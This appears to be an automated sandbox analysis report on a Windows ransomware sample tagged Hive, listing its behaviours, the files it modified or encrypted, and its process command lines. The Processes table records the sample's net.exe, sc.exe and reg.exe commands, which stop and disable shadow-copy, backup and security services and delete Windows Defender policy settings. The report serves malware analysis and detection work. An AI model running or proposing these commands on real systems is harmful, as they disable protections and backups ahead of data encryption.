Analysis Overview
SHA256: dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413
Threat Level: Known bad
The file dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413 was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Interacts with shadow copies
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported: 2022-01-13 13:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2022-01-13 13:15
Reported: 2022-01-13 13:20
Platform: win7-en-20211208
Max time kernel: 19s
Max time network: 16s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_yON8OUuNf6w0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\add_down.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop.wmv | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsNotesBackground.wmv | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\settings.css | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_BqLrzRE_XZU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\ja-JP\WMPDMC.exe.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_left.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_8DRUT4ZDHr80.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_UXgU9VSg9yA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_lvpmm5TgBkg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.jpg | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\de-DE\wmpnetwk.exe.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_settings.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_NuGqTGRYZ9w0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_HtTsxgTYzio0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_mM3D8vNbLhg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Maceio.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_JesLK8qC4Xc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\es-ES\WMPDMC.exe.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\settings.html | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mip.exe.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_nxmiqEHLXhg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_mwRNocGIRTU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_qpObUIThgjA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_Fg4-7DZ1Y1k0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_5XU08yWcQns0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Belize.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_9UKLnagsxJc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\js\settings.js | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\settings.html | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_cFB09WKWJc80.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_2UoNOqxYoY40.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\rtstreamsink.ax | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_0LGxak5gF140.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_hPxadaAiJZQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_I0tyt2AufSQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_Txa-NztkAvk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX__Afg6nichYQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\pushplaysubpicture.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_r7vtz-l-4Cw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_upIbecqDeQg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_BaFoJs1Tw0I0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_fI_ra2osplU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_I_J1VdERECM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Hearts\en-US\Hearts.exe.mui.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_Mh5Hsyb1e7w0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\SpiderSolitaire.exe.mui.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_T60PltQ5pXQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\weather.css | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_JOfUbhPDV0M0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_D6OseAH5CrQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_AmaHDGD_IP80.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | "C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe" |
| C:\Windows\system32\net.exe | net.exe stop "NetMsmqActivator" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "NetMsmqActivator" /y |
| C:\Windows\system32\net.exe | net.exe stop "SamSs" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y |
| C:\Windows\system32\net.exe | net.exe stop "SDRSVC" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y |
| C:\Windows\system32\net.exe | net.exe stop "SstpSvc" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y |
| C:\Windows\system32\net.exe | net.exe stop "UI0Detect" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y |
| C:\Windows\system32\net.exe | net.exe stop "VSS" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "VSS" /y |
| C:\Windows\system32\net.exe | net.exe stop "wbengine" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y |
| C:\Windows\system32\net.exe | net.exe stop "WebClient" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y |
| C:\Windows\system32\sc.exe | sc.exe config "NetMsmqActivator" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "SamSs" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "SDRSVC" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "SstpSvc" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "UI0Detect" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "VSS" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "wbengine" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "WebClient" start= disabled |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
